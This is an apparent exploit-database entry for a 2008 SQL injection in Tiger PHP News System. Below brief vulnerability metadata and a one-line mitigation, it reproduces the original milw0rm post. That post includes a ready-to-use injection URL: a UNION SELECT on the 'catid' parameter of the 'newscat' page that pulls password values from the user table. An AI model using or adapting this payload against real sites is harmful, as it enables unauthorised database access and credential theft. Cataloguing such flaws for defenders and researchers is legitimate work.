header-logo
Suggest Exploit
vendor:
Tiger PHP News System
by:
0in
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Tiger PHP News System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Tiger PHP News System SQL Injection

A vulnerability exists in Tiger PHP News System, which allows an attacker to inject arbitrary SQL commands via the 'catid' parameter in the 'page=newscat' module. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

/*
 *Tiger PHP News System SQL Injection
 *Bug found bY 0in from DaRk-Coders Group!
 *Homepage: http://dark-coders.4rh.eu or http://dark-coders.prv.pl
 *IRC:#dark-coders at irc.freenode.org
 *Email: 0in(dot)email(at)gmail(dot)com
*/

 Script home: http://tpns.k-na.se/
 Exploit: http://localhost/?page=newscat&catid=-666%20union%20select%20passwd%20from%20user

 Greetings to:All Dark-Coders Team Members - Die-Angel,m4r1usz,suN8Hclf,Djlinux,
 Aristo89

# milw0rm.com [2008-01-25]

Navigation

Suggest Exploit

Services By CQR